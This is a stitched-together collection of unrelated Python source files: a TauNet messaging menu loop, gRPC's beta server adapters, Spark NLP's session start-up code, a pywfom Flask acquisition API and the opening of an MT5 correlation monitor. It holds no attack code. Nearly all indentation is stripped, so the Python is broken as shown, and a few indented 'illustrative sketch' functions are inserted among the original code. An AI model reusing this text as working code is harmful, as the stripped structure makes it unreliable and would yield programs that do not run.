## ASCII TEXT ART FROM: http://patorjk.com/software/taag/#p=display&f=Slant
# Select file to open
while True:
filename = input("Enter TauNet filename, type 'new' to create new TauNet, or type '!EXIT' to exit.\n: >> ")
if filename == '!EXIT':
return None
elif filename == 'new':
user_list = user_func.u_list()
user_list.input_u_list()
else:
try:
open(filename)
except IOError:
print(filename + " does not exist.")
if input("Would you like to create it? (y/n): ") == 'y':
user_list = user_func.u_list()
user_list.input_u_list(filename)
break
else:
user_list = user_func.u_list(filename)
break
# Set up local variables
message_hist = messages.message_list()
user_info = old_user = None
# Set up global variable
my_user_name = user_list.me
key = user_list.key
filename = user_list.filename
input_message = "TauNet (" + filename + ") v" + TauNet_version + ">> "
# Start Listening for incoming messages
listen_thread = threading.Thread(target=listen, args = (user_list, message_hist,))
listen_thread.daemon = True
listen_thread.start()
# Menu loop
while True:
split_command = None
command = input('\n' + input_message)
if command == '':
None# Do nothing
# Send a message to a user
elif command[0] == '@':
user_name, message = read_command(command)
if(user_name != ''):
old_user = user_info
user_info = None
user_info = user_list.search_users(user_name)
if user_info: #send the message
at(user_info, message)
else:
user_info = old_user
print("Error:\n * Invalid Command. ? for help.") ##Invalid user_name
# Add a user to the list
elif command[0] == '+':
split_command = read_command(command)
if (split_command[0] != '' and split_command[1] != '' and
user_func.valid_user(split_command[0]) and
user_list.add_user(split_command)):
user_list.write_file()
else:
print("Error:\n * Users name may only contain uppercase and lowercase letters from a-z, the numbers from 0-9, and the - symbol.\n * User names must also not have already been added to the list.")
# Remove a user from the list
elif command[0] == '-':
if command == '-':
print("Error:\n * Invalid Command. ? for help.")
elif user_list.remove_user(command[1:]):
user_list.write_file()
user_info = None
# Display the last n messages
# or the last message
elif command[0] == '#':
try:
lines = int(command[1:])
except:
lines = -1
if lines > 0 and lines < 21:
message_hist.print_n(lines)
else:
print("Error:\n * n must be a whole number from 1 to 20 represented in digits.")
# Display the list of users
elif command == '~':
user_list.print_users(); print()
# Display help menu
elif command == '?':
help_menu()
# Clear the Screen
elif command == '!CLEAR':
clear()
# Exit the program
elif command == '!EXIT':
return
#Invalid command
else:
print("Error:\n * Invalid Command. ? for help.")
return None
if __name__ == "__main__":
clear()
main()
clear()
|
_server_adaptations.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Translates gRPC's server-side API into gRPC's server-side Beta API."""
import collections
import threading
import grpc
from grpc import _common
from grpc.beta import _metadata
from grpc.beta import interfaces
from grpc.framework.common import cardinality
from grpc.framework.common import style
from grpc.framework.foundation import abandonment
from grpc.framework.foundation import logging_pool
from grpc.framework.foundation import stream
from grpc.framework.interfaces.face import face
# pylint: disable=too-many-return-statements
_DEFAULT_POOL_SIZE = 8
class _ServerProtocolContext(interfaces.GRPCServicerContext):
def __init__(self, servicer_context):
self._servicer_context = servicer_context
def peer(self):
return self._servicer_context.peer()
def disable_next_response_compression(self):
pass # TODO(https://github.com/grpc/grpc/issues/4078): design, implement.
class _FaceServicerContext(face.ServicerContext):
def __init__(self, servicer_context):
self._servicer_context = servicer_context
def is_active(self):
return self._servicer_context.is_active()
def time_remaining(self):
return self._servicer_context.time_remaining()
def add_abortion_callback(self, abortion_callback):
raise NotImplementedError(
'add_abortion_callback no longer supported server-side!')
def cancel(self):
self._servicer_context.cancel()
def protocol_context(self):
return _ServerProtocolContext(self._servicer_context)
def invocation_metadata(self):
return _metadata.beta(self._servicer_context.invocation_metadata())
def initial_metadata(self, initial_metadata):
self._servicer_context.send_initial_metadata(
_metadata.unbeta(initial_metadata))
def terminal_metadata(self, terminal_metadata):
self._servicer_context.set_terminal_metadata(
_metadata.unbeta(terminal_metadata))
def code(self, code):
self._servicer_context.set_code(code)
def details(self, details):
self._servicer_context.set_details(details)
def _adapt_unary_request_inline(unary_request_inline):
def adaptation(request, servicer_context):
return unary_request_inline(request,
_FaceServicerContext(servicer_context))
return adaptation
def _adapt_stream_request_inline(stream_request_inline):
def adaptation(request_iterator, servicer_context):
return stream_request_inline(request_iterator,
_FaceServicerContext(servicer_context))
return adaptation
class _Callback(stream.Consumer):
def __init__(self):
self._condition = threading.Condition()
self._values = []
self._terminated = False
self._cancelled = False
def consume(self, value):
with self._condition:
self._values.append(value)
self._condition.notify_all()
def terminate(self):
with self._condition:
self._terminated = True
self._condition.notify_all()
def consume_and_terminate(self, value):
with self._condition:
self._values.append(value)
self._terminated = True
self._condition.notify_all()
def cancel(self):
with self._condition:
self._cancelled = True
self._condition.notify_all()
def draw_one_value(self):
with self._condition:
while True:
if self._cancelled:
raise abandonment.Abandoned()
elif self._values:
return self._values.pop(0)
elif self._terminated:
return None
else:
self._condition.wait()
def draw_all_values(self):
with self._condition:
while True:
if self._cancelled:
raise abandonment.Abandoned()
elif self._terminated:
all_values = tuple(self._values)
self._values = None
return all_values
else:
self._condition.wait()
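# Illustrative sketch, not part of the original module: _Callback bridges the event-style
# (push) beta API to the pull-style iteration used by the handlers above. A producer thread
# pushes values with consume()/terminate() while the handler drains them with
# draw_one_value()/draw_all_values().
def _example_callback_bridge():
    callback = _Callback()
    def produce():
        callback.consume('a')
        callback.consume_and_terminate('b')
    threading.Thread(target=produce).start()
    assert callback.draw_one_value() == 'a'       # blocks until a value arrives
    assert callback.draw_all_values() == ('b',)   # blocks until the stream terminates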
def _run_request_pipe_thread(request_iterator, request_consumer,
servicer_context):
thread_joined = threading.Event()
def pipe_requests():
for request in request_iterator:
if not servicer_context.is_active() or thread_joined.is_set():
return
request_consumer.consume(request)
if not servicer_context.is_active() or thread_joined.is_set():
return
request_consumer.terminate()
request_pipe_thread = threading.Thread(target=pipe_requests)
request_pipe_thread.daemon = True
request_pipe_thread.start()
def _adapt_unary_unary_event(unary_unary_event):
def adaptation(request, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
unary_unary_event(request, callback.consume_and_terminate,
_FaceServicerContext(servicer_context))
return callback.draw_all_values()[0]
return adaptation
def _adapt_unary_stream_event(unary_stream_event):
def adaptation(request, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
unary_stream_event(request, callback,
_FaceServicerContext(servicer_context))
while True:
response = callback.draw_one_value()
if response is None:
return
else:
yield response
return adaptation
def _adapt_stream_unary_event(stream_unary_event):
def adaptation(request_iterator, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
request_consumer = stream_unary_event(
callback.consume_and_terminate,
_FaceServicerContext(servicer_context))
_run_request_pipe_thread(request_iterator, request_consumer,
servicer_context)
return callback.draw_all_values()[0]
return adaptation
def _adapt_stream_stream_event(stream_stream_event):
def adaptation(request_iterator, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
request_consumer = stream_stream_event(
callback, _FaceServicerContext(servicer_context))
_run_request_pipe_thread(request_iterator, request_consumer,
servicer_context)
while True:
response = callback.draw_one_value()
if response is None:
return
else:
yield response
return adaptation
class _SimpleMethodHandler(
collections.namedtuple('_MethodHandler', (
'request_streaming',
'response_streaming',
'request_deserializer',
'response_serializer',
'unary_unary',
'unary_stream',
'stream_unary',
'stream_stream',
)), grpc.RpcMethodHandler):
pass
def _simple_method_handler(implementation, request_deserializer,
response_serializer):
if implementation.style is style.Service.INLINE:
if implementation.cardinality is cardinality.Cardinality.UNARY_UNARY:
return _SimpleMethodHandler(False, False, request_deserializer,
response_serializer,
_adapt_unary_request_inline(
implementation.unary_unary_inline),
None, None, None)
elif implementation.cardinality is cardinality.Cardinality.UNARY_STREAM:
return _SimpleMethodHandler(False, True, request_deserializer,
response_serializer, None,
_adapt_unary_request_inline(
implementation.unary_stream_inline),
None, None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_UNARY:
return _SimpleMethodHandler(True, False, request_deserializer,
response_serializer, None, None,
_adapt_stream_request_inline(
implementation.stream_unary_inline),
None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_STREAM:
return _SimpleMethodHandler(
True, True, request_deserializer, response_serializer, None,
None, None,
_adapt_stream_request_inline(
implementation.stream_stream_inline))
elif implementation.style is style.Service.EVENT:
if implementation.cardinality is cardinality.Cardinality.UNARY_UNARY:
return _SimpleMethodHandler(False, False, request_deserializer,
response_serializer,
_adapt_unary_unary_event(
implementation.unary_unary_event),
None, None, None)
elif implementation.cardinality is cardinality.Cardinality.UNARY_STREAM:
return _SimpleMethodHandler(False, True, request_deserializer,
response_serializer, None,
_adapt_unary_stream_event(
implementation.unary_stream_event),
None, None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_UNARY:
return _SimpleMethodHandler(True, False, request_deserializer,
response_serializer, None, None,
_adapt_stream_unary_event(
implementation.stream_unary_event),
None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_STREAM:
return _SimpleMethodHandler(True, True, request_deserializer,
response_serializer, None, None, None,
_adapt_stream_stream_event(
implementation.stream_stream_event))
raise ValueError()
def _flatten_method_pair_map(method_pair_map):
method_pair_map = method_pair_map or {}
flat_map = {}
for method_pair in method_pair_map:
method = _common.fully_qualified_method(method_pair[0], method_pair[1])
flat_map[method] = method_pair_map[method_pair]
return flat_map
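# Illustrative sketch, not part of the original module: the beta API keys implementations by
# (group, method) tuples, while grpc.GenericRpcHandler.service() receives a single
# fully-qualified method string (assumed to look like '/pkg.Service/Method'), so the map is
# rekeyed accordingly.
def _example_flatten():
    impl = object()  # stand-in for a method implementation
    flat = _flatten_method_pair_map({('pkg.Service', 'Method'): impl})
    assert list(flat.values()) == [impl]
    assert _flatten_method_pair_map(None) == {}   # None is treated as an empty map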
class _GenericRpcHandler(grpc.GenericRpcHandler):
def __init__(self, method_implementations, multi_method_implementation,
request_deserializers, response_serializers):
self._method_implementations = _flatten_method_pair_map(
method_implementations)
self._request_deserializers = _flatten_method_pair_map(
request_deserializers)
self._response_serializers = _flatten_method_pair_map(
response_serializers)
self._multi_method_implementation = multi_method_implementation
def service(self, handler_call_details):
method_implementation = self._method_implementations.get(
handler_call_details.method)
if method_implementation is not None:
return _simple_method_handler(method_implementation,
self._request_deserializers.get(
handler_call_details.method),
self._response_serializers.get(
handler_call_details.method))
elif self._multi_method_implementation is None:
return None
else:
try:
return None #TODO(nathaniel): call the multimethod.
except face.NoSuchMethodError:
return None
class _Server(interfaces.Server):
def __init__(self, grpc_server):
self._grpc_server = grpc_server
def add_insecure_port(self, address):
return self._grpc_server.add_insecure_port(address)
def add_secure_port(self, address, server_credentials):
return self._grpc_server.add_secure_port(address, server_credentials)
def start(self):
self._grpc_server.start()
def stop(self, grace):
return self._grpc_server.stop(grace)
def __enter__(self):
self._grpc_server.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._grpc_server.stop(None)
return False
def server(service_implementations, multi_method_implementation,
request_deserializers, response_serializers, thread_pool,
thread_pool_size):
generic_rpc_handler = _GenericRpcHandler(
service_implementations, multi_method_implementation,
request_deserializers, response_serializers)
if thread_pool is None:
effective_thread_pool = logging_pool.pool(_DEFAULT_POOL_SIZE
if thread_pool_size is None
else thread_pool_size)
else:
effective_thread_pool = thread_pool
return _Server(
grpc.server(effective_thread_pool, handlers=(generic_rpc_handler,)))
|
__init__.py
|
# Copyright 2017-2021 John Snow Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import subprocess
import threading
from pyspark.sql import SparkSession
from sparknlp import annotator
from sparknlp.base import DocumentAssembler, Finisher, EmbeddingsFinisher, TokenAssembler, Chunk2Doc, Doc2Chunk
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.java_gateway import launch_gateway
sys.modules['com.johnsnowlabs.nlp.annotators'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.tokenizer'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.tokenizer.wordpiece'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner.regex'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner.crf'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner.dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.pos'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.pos.perceptron'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sbd'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sbd.pragmatic'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sbd.deep'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sda'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sda.pragmatic'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sda.vivekn'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell.norvig'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell.symmetric'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.parser'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.parser.dep'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.parser.typdep'] = annotator
sys.modules['com.johnsnowlabs.nlp.embeddings'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.classifier'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.classifier.dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell.context'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ld'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ld.dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sentence_detector_dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.seq2seq'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ws'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.er'] = annotator
annotators = annotator
embeddings = annotator
def start(gpu=False,
spark23=False,
spark24=False,
memory="16G",
cache_folder="",
log_folder="",
cluster_tmp_dir="",
real_time_output=False,
output_level=1):
"""Starts a PySpark instance with default parameters for Spark NLP.
The default parameters would result in the equivalent of:
.. code-block:: python
:param gpu: start Spark NLP with GPU
:param spark23: start Spark NLP on Apache Spark 2.3.x
:param spark24: start Spark NLP on Apache Spark 2.4.x
:param memory: set driver memory for SparkSession
:param cache_folder: The location to download and exctract pretrained Models and Pipelines
:param log_folder: The location to save logs from annotators during training such as NerDLApproach,
ClassifierDLApproach, SentimentDLApproach, MultiClassifierDLApproach, etc.
:param cluster_tmp_dir: The location to use on a cluster for temporarily files
:param output_level: int, optional
Output level for logs, by default 1
:param real_time_output:
:substitutions:
SparkSession.builder \\
.appName("Spark NLP") \\
.master("local[*]") \\
.config("spark.driver.memory", "16G") \\
.config("spark.serializer", "org.apache.spark.serializer.KryoSerializer") \\
.config("spark.kryoserializer.buffer.max", "2000M") \\
.config("spark.driver.maxResultSize", "0") \\
.config("spark.jars.packages", "com.johnsnowlabs.nlp:spark-nlp_2.12:|release|") \\
.getOrCreate()
Parameters
----------
gpu : bool, optional
Whether to enable GPU acceleration (must be set up correctly), by default False
spark23 : bool, optional
Whether to use the Spark 2.3.x version of Spark NLP, by default False
spark24 : bool, optional
Whether to use the Spark 2.4.x version of Spark NLP, by default False
memory : str, optional
How much memory to allocate for the Spark driver, by default "16G"
real_time_output : bool, optional
Whether to ouput in real time, by default False
output_level : int, optional
Output level for logs, by default 1
Returns
-------
:class:`SparkSession`
The initiated Spark session.
"""
current_version = "3.3.4"
class SparkNLPConfig:
def __init__(self):
self.master, self.app_name = "local[*]", "Spark NLP"
self.serializer, self.serializer_max_buffer = "org.apache.spark.serializer.KryoSerializer", "2000M"
self.driver_max_result_size = "0"
# Spark NLP on Apache Spark 3.0.x
self.maven_spark = "com.johnsnowlabs.nlp:spark-nlp_2.12:{}".format(current_version)
self.maven_gpu_spark = "com.johnsnowlabs.nlp:spark-nlp-gpu_2.12:{}".format(current_version)
# Spark NLP on Apache Spark 2.4.x
self.maven_spark24 = "com.johnsnowlabs.nlp:spark-nlp-spark24_2.11:{}".format(current_version)
self.maven_gpu_spark24 = "com.johnsnowlabs.nlp:spark-nlp-gpu-spark24_2.11:{}".format(current_version)
# Spark NLP on Apache Spark 2.3.x
self.maven_spark23 = "com.johnsnowlabs.nlp:spark-nlp-spark23_2.11:{}".format(current_version)
self.maven_gpu_spark23 = "com.johnsnowlabs.nlp:spark-nlp-gpu-spark23_2.11:{}".format(current_version)
def start_without_realtime_output():
builder = SparkSession.builder \
.appName(spark_nlp_config.app_name) \
.master(spark_nlp_config.master) \
.config("spark.driver.memory", memory) \
.config("spark.serializer", spark_nlp_config.serializer) \
.config("spark.kryoserializer.buffer.max", spark_nlp_config.serializer_max_buffer) \
.config("spark.driver.maxResultSize", spark_nlp_config.driver_max_result_size)
if gpu and spark23:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark23)
elif gpu and spark24:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark24)
elif spark23:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark23)
elif spark24:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark24)
elif gpu:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark)
else:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark)
if cache_folder != '':
builder.config("spark.jsl.settings.pretrained.cache_folder", cache_folder)
if log_folder != '':
builder.config("spark.jsl.settings.annotator.log_folder", log_folder)
if cluster_tmp_dir != '':
builder.config("spark.jsl.settings.storage.cluster_tmp_dir", cluster_tmp_dir)
return builder.getOrCreate()
def start_with_realtime_output():
class SparkWithCustomGateway:
def __init__(self):
spark_conf = SparkConf()
spark_conf.setAppName(spark_nlp_config.app_name)
spark_conf.setMaster(spark_nlp_config.master)
spark_conf.set("spark.driver.memory", memory)
spark_conf.set("spark.serializer", spark_nlp_config.serializer)
spark_conf.set("spark.kryoserializer.buffer.max", spark_nlp_config.serializer_max_buffer)
spark_conf.set("spark.driver.maxResultSize", spark_nlp_config.driver_max_result_size)
if gpu:
spark_conf.set("spark.jars.packages", spark_nlp_config.maven_gpu_spark)
else:
spark_conf.set("spark.jars.packages", spark_nlp_config.maven_spark)
if cache_folder != '':
spark_conf.config("spark.jsl.settings.pretrained.cache_folder", cache_folder)
if log_folder != '':
spark_conf.config("spark.jsl.settings.annotator.log_folder", log_folder)
if cluster_tmp_dir != '':
spark_conf.config("spark.jsl.settings.storage.cluster_tmp_dir", cluster_tmp_dir)
# Make the py4j JVM stdout and stderr available without buffering
popen_kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
'bufsize': 0
}
# Launch the gateway with our custom settings
self.gateway = launch_gateway(conf=spark_conf, popen_kwargs=popen_kwargs)
self.process = self.gateway.proc
# Use the gateway we launched
spark_context = SparkContext(gateway=self.gateway)
self.spark_session = SparkSession(spark_context)
self.out_thread = threading.Thread(target=self.output_reader)
self.error_thread = threading.Thread(target=self.error_reader)
self.std_background_listeners()
def std_background_listeners(self):
self.out_thread.start()
self.error_thread.start()
def output_reader(self):
for line in iter(self.process.stdout.readline, b''):
print('{0}'.format(line.decode('utf-8')), end='')
def error_reader(self):
RED = '\033[91m'
RESET = '\033[0m'
for line in iter(self.process.stderr.readline, b''):
if output_level == 0:
print(RED + '{0}'.format(line.decode('utf-8')) + RESET, end='')
else:
# output just info
pass
def shutdown(self):
self.spark_session.stop()
self.gateway.shutdown()
self.process.communicate()
self.out_thread.join()
self.error_thread.join()
return SparkWithCustomGateway()
spark_nlp_config = SparkNLPConfig()
if real_time_output:
if spark23 or spark24:
spark_session = start_without_realtime_output()
return spark_session
else:
# Available from Spark 3.0.x
class SparkRealTimeOutput:
def __init__(self):
self.__spark_with_custom_gateway = start_with_realtime_output()
self.spark_session = self.__spark_with_custom_gateway.spark_session
def shutdown(self):
self.__spark_with_custom_gateway.shutdown()
return SparkRealTimeOutput()
else:
spark_session = start_without_realtime_output()
return spark_session
def version():
"""Returns the current Spark NLP version.
Returns
-------
str
The current Spark NLP version.
"""
return '3.3.4'
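# Hypothetical usage sketch, not part of the original module: a typical way to start a
# default Spark NLP session; the memory value below is only an example.
def _example_start_session():
    spark = start(memory="16G")          # add gpu=True to pull the GPU package instead
    print(version(), spark.version)      # Spark NLP version and underlying Spark version
    return spark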
|
system.py
|
from flask import request, jsonify, session
from tqdm import tqdm
import traceback, json, time, os, datetime, threading, pywfom
import numpy as np
from . import api
from .. import models
from ...devices.arduino import Arduino
from ...devices.camera import Camera
DEFAULT_FILE = {
"directory":os.environ['PYWFOM_DIR'] if 'PYWFOM_DIR' in os.environ else None,
"number_of_runs":"",
"run_length":"",
"run_length_unit":"sec"
}
# ****** Create Controllable System ********
class _SystemException(Exception):
pass
class _System(object):
"""docstring for _System."""
def __init__(self):
self.arduino = Arduino()
self.cameras = []
self.file = DEFAULT_FILE
self.acquiring = False
self.username = None
self.mouse = None
self.write_speed = 0
self.primary_framerate = 0
def benchmark_disk(self):
pass
def set_from_file(self, path):
# Clear existing settings
self.delete()
# Start system from specified path, otherwise ignore
with open(path, 'r') as f:
settings = json.load(f)
self.post(None, settings)
f.close()
def set_from_user_default(self, user, pwd):
# Clear existing settings
self.delete()
self.username = user
# Retrieve settings from MongoDB
default = models.User.objects(username=user, password=pwd).get().default
# Post the settings
self.post(id=None, settings=json.loads(default.to_json()))
def get(self, setting=None):
resp = {
"file":self.file,
"cameras":[cam.json() for cam in self.cameras],
"arduino":self.arduino.json() if self.arduino else {},
"username":self.username,
"mouse":self.mouse
}
if not setting:
return resp
elif setting in resp:
return resp[setting]
else:
return self.cameras[int(setting)].json()
def delete(self, id=None):
if id == None:
self.file = {}
_ = self.arduino.close() if self.arduino else None
self.arduino = None
[cam.close() for cam in self.cameras]
self.cameras = []
elif id == 'file':
self.file = {}
elif id == 'arduino':
_ = self.arduino.close() if self.arduino else None
self.arduino = None
elif id == 'cameras':
[cam.close() for cam in self.cameras]
self.cameras = []
else:
cam = self.cameras.pop(int(id))
cam.close()
return f"Successfully delete {id}", 200
def put(self, id=None, settings={}):
if id == 'file':
self.file = settings
elif id == 'arduino':
if not self.arduino:
return "Arduino is not initialized", 400
else:
self.arduino.set(**settings)
elif id == 'mouse':
self.mouse = settings
else:
self.cameras[int(id)].set(**settings)
return self.get(id)
def post(self, id=None, settings={}):
if id == 'file':
self.file = settings
elif id == 'cameras':
_newcam = Camera(**settings)
self.cameras.append( _newcam )
return _newcam.json()
elif id == 'arduino':
if self.arduino:
return "Cannot POST to Initialized Arduino", 400
else:
self.arduino = Arduino(**settings)
elif id == None:
self.file = settings['file']
self.cameras = [Camera(**config) for config in settings['cameras']]
self.arduino = Arduino(**settings['arduino'])
else:
setattr(self, id, settings)
return self.get(id)
def stop_acquisition(self):
self.acquiring = False
def check_acquisition_settings(self):
if self.acquiring:
return ["All Good"]
else:
errors = []
# Check run settings
for key in ['run_length', 'run_length_unit', 'number_of_runs', 'directory']:
if not self.file[key]:
errors.append(f"{key} is missing from file settings")
# CAMERA SETTINGS
_camera_settings = [cam.json() for cam in self.cameras]
# Check number of cameras
if len(_camera_settings) == 0:
errors.append("No cameras have been added")
# Assert proper number of primary cameras
_primary_fr = [cam['framerate'] for cam in _camera_settings if cam['primary']]
if len(_primary_fr) == 0:
errors.append("You must specify a primary camera")
elif len(_primary_fr) > 1:
error.append("You can only specify one primary camera")
else:
self.primary_framerate = _primary_fr[0]
_over = [cam['framerate'] < self.primary_framerate for cam in _camera_settings if not cam['primary']]
# TODO: Ensure cameras aren't going over their maximum framerate
# Check additional data settings
for key in ['username', 'mouse']:
if not getattr(self, key):
errors.append(f"{key} was not specified")
return errors
def start_acquisition(self):
print("Starting an acquisition")
path = os.path.join(self.file['directory'], datetime.datetime.now().strftime('%m_%d_%Y_%H%M%S'))
os.mkdir(path)
for cam in self.cameras:
cam.acquiring = True
for i in tqdm(range(int(self.file['number_of_runs'])), unit="run"):
run = self._create_run()
if not run:
break
else:
os.mkdir(f"{path}/run{i}")
rl, rlu = self.file['run_length'], self.file['run_length_unit']
num_frames = self.primary_framerate*rl*{"sec":1,"min":60,"hr":3600}[rlu]
for j in tqdm(range(int(num_frames)), leave=False, unit="frame"):
# Place latest frame from each camera in dict
frames = {
f"{cam.id}":cam.acquired_frames.get() for cam in self.cameras
}
# Create thread arguments
args = (f"{path}/run{i}/frame{j}.npz", frames, run,)
# Start a thread to write to file and mongodb
threading.Thread(target=self._write_to_file, args=args).start()
run.save()
for cam in self.cameras:
cam.acquiring = False
return True, []
def _create_run(self):
# Check to see if MongoDB keys are valid
try:
mouse = models.Mouse.objects(name=self.mouse).get()
user = models.User.objects(username=self.username).get()
config = models.Configuration(
file=self.file,
arduino=self.arduino.json(),
cameras=[cam.json() for cam in self.cameras]
).save()
return models.Run(mouse=mouse,user=user,configuration=config,frames=[], timestamp=datetime.datetime.now())
except Exception as e:
traceback.print_exc()
return None
def _write_to_file(self, fname, frames, run):
np.savez(fname, **frames)
frame = models.Frame(file=fname)
frame.save()
run.frames.append(frame)
# ****** Initialize System ********
system = _System()
# ************* System Settings API Calls ******************
@api.route('/system/settings', methods=['GET'])
@api.route('/system/settings/<id>', methods=['GET'])
def get_settings(id=None):
# Retrieve the current settings of the session
return jsonify( system.get(id) )
@api.route('/system/settings', methods=['POST'])
@api.route('/system/settings/<id>', methods=['POST'])
def post_settings(id=None):
# Add settings to the current session
return jsonify( system.post(id, request.get_json()) )
@api.route('/system/settings/<id>', methods=['PUT'])
def put_settings(id):
# Adjust settings in the current session
return jsonify( system.put(id, request.get_json()) )
@api.route('/system/settings', methods=["DELETE"])
@api.route('/system/settings/<id>', methods=["DELETE"])
def delete_settings(id=None):
# Delete settings in the current session
return system.delete(id)
@api.route('/system/acquisition', methods=["GET"])
def get_acquisition():
return jsonify(system.check_acquisition_settings())
@api.route('/system/acquisition', methods=["DELETE"])
def stop_acquisition():
return "Success", 200
@api.route('/system/acquisition', methods=['POST'])
def start_acquisition():
try:
system.start_acquisition()
return "Success", 200
except Exception as e:
traceback.print_exc()
return str(e), 404
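# Hypothetical client-side sketch, not part of the original module. It assumes the `api`
# blueprint is served at http://localhost:5000/api; adjust the base URL to wherever the
# Flask app is actually mounted.
def _example_rest_client(base_url="http://localhost:5000/api"):
    import requests
    current = requests.get(f"{base_url}/system/settings").json()          # full system state
    requests.post(f"{base_url}/system/settings/file", json={              # configure the file settings
        "directory": "/tmp/wfom", "number_of_runs": 1,
        "run_length": 10, "run_length_unit": "sec"})
    errors = requests.get(f"{base_url}/system/acquisition").json()        # pre-acquisition checks
    return current, errors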
|
correlation.py
|
import math
import logging
import pandas as pd
from datetime import datetime, timedelta
import time
import sched
import threading
import pytz
from scipy.stats.stats import pearsonr
import pickle
import inspect
import sys
from mt5_correlation.mt5 import MT5
class CorrelationStatus:
"""
The status of the monitoring event for a symbol pair.
"""
val = None
text = None
long_text = None
def __init__(self, status_val, status_text, status_long_text=None):
"""
Creates a status.
:param status_val:
:param status_text:
:param status_long_text
:return:
"""
self.val = status_val
self.text = status_text
self.long_text = status_long_text
def __eq__(self, other):
"""
Compare the status val. We can compare against other CorrelationStatus instances or against int.
:param other:
:return:
"""
if isinstance(other, self.__class__):
return self.val == other.val
elif isinstance(other, int):
return self.val == other
else:
return False
def __str__(self):
"""
str is the text for the status.
:return:
"""
return self.text
# All statuses for a symbol pair from monitoring. Status is set by assessing the coefficients for all timeframes from the last run.
STATUS_NOT_CALCULATED = CorrelationStatus(-1, 'NOT CALC', 'Coefficient could not be calculated')
STATUS_CORRELATED = CorrelationStatus(1, 'CORRELATED', 'Coefficients for all timeframes are equal to or above the '
'divergence threshold')
STATUS_DIVERGED = CorrelationStatus(2, 'DIVERGED', 'Coefficients for all timeframes are below the divergence threshold')
STATUS_INCONSISTENT = CorrelationStatus(3, 'INCONSISTENT', 'Coefficients not consistently above or below divergence '
'threshold and are neither trending towards divergence or '
'convergence')
STATUS_DIVERGING = CorrelationStatus(4, 'DIVERGING', 'Coefficients, when ordered by timeframe, are trending '
'towards divergence. The shortest timeframe is below the '
'divergence threshold and the longest timeframe is above the '
'divergence threshold')
STATUS_CONVERGING = CorrelationStatus(5, 'CONVERGING', 'Coefficients, when ordered by timeframe, are trending '
'towards convergence. The shortest timeframe is above the '
'divergence threshold and the longest timeframe is below the '
'divergence threshold')
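# Illustrative sketch, not part of the original module: because CorrelationStatus.__eq__
# accepts either another status or a plain int, a status held in coefficient_data can be
# compared against the module-level constants above or against their raw values.
def _example_status_comparison():
    status = STATUS_DIVERGED
    assert status == STATUS_DIVERGED       # compare against another CorrelationStatus
    assert status == 2                     # or against the underlying int value
    assert str(status) == 'DIVERGED'       # str() returns the short text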
class Correlation:
"""
A class to maintain the state of the calculated correlation coefficients.
"""
# Connection to MetaTrader5
__mt5 = None
# Minimum base coefficient for monitoring. Symbol pairs with a lower correlation
# coefficient than this won't be monitored.
monitoring_threshold = 0.9
# Threshold for divergence. Correlation coefficients that were previously above the monitoring_threshold and fall
# below this threshold will be considered as having diverged
divergence_threshold = 0.8
